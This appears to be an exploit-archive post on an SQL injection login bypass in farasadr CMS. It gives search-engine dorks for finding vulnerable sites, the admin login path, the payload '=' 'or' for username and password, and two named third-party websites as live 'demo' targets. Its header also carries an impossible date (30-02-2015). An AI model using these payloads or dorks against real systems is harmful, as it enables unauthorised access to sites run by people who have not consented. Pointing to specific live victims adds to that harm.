facebook facebook twitter rss

farasadr CMS Login page Bypass Vulnerability

Author: Janviruser , Published: 11-02-2015
##############################################################

# Exploit Title: farasadr CMS Login page Bypass Vulnerability

#

# Exploit Author: Janviruser

#



# Dork: intext: طراحی و پیاده سازی : گروه مهندسین فراصدر

# 'or'



# intext: برنامه نویس و پشتیبان : نوید وکیلی

# Date: 30-02-2015

# Tested on: Kali, Win7

#

# Vendor's: http://www.farasadr.ir/

#

##############################################################

VULNERABILITY

##############

[~] VULNERABILITY}~~



[~] http://www.Site.com/Manager/frames/login.php
'or'

[~] http://www.Site.com/Manager

# Username : '=' 'or'

#

# Password : '=' 'or'



##############



demo 1: http://www.footballyazd.ir/manager/



demo 2: http://fouladyazdfc.ir/Manager/frames/login.php



##############################################################


Contact mail: janviruser@gmail.com

-------------------Special Thanks of : saeed.keshvari-------------------

##############################################################

Like us on Facebook :